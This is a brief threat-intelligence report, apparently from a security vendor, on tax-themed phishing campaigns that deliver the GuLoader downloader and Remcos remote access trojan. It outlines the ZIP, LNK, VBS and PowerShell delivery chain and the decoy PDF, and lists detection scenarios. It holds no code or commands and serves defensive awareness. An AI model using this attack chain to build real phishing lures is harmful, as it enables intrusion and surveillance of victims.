Tax Season Brings News Tax-themed Phishing Campaigns

Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Red Canary

Phishing campaigns with financial themes were observed throughout the year, but their occurrence tends to rise before and during tax season, especially regarding tax and accounting themes. This applies to businesses in all sectors, not only in the financial industry. The most recent campaigns reported by Red Canary have contained the GuLoader malware downloader used to distribute remote access trojans (RATs) like Remcos. The tax-themed malicious attachments make references to new orders for accounting services, documentation involving the IRS, or tax files belonging to clients. Attachments from the campaign have used a combination of a password-protected zip file containing a shortcut (LNK) file and a Visual Basic (VBS) script to launch PowerShell into downloading remote payload. Along with the malicious activity, the shortcut file also opens a decoy PDF file to deceive the victim into believing they have only downloaded a harmless PDF document. Several attack chains complete with the installation of a RAT for surveillance or download of additional malware. Red Canary suggests the key "indicators of successful Remcos installation include suspicious registry changes for persistence and malicious processes making outbound network connections to C2 IP addresses."

Anvilogic Scenarios:

• LNK & LOLBin
• ZIP/LNK Evasion Tactics Lead to PS, Persistence/System Impact

Anvilogic Use Cases:

• Compressed File Execution
• Wscript/Cscript Execution
• Invoke-WebRequest Command

‍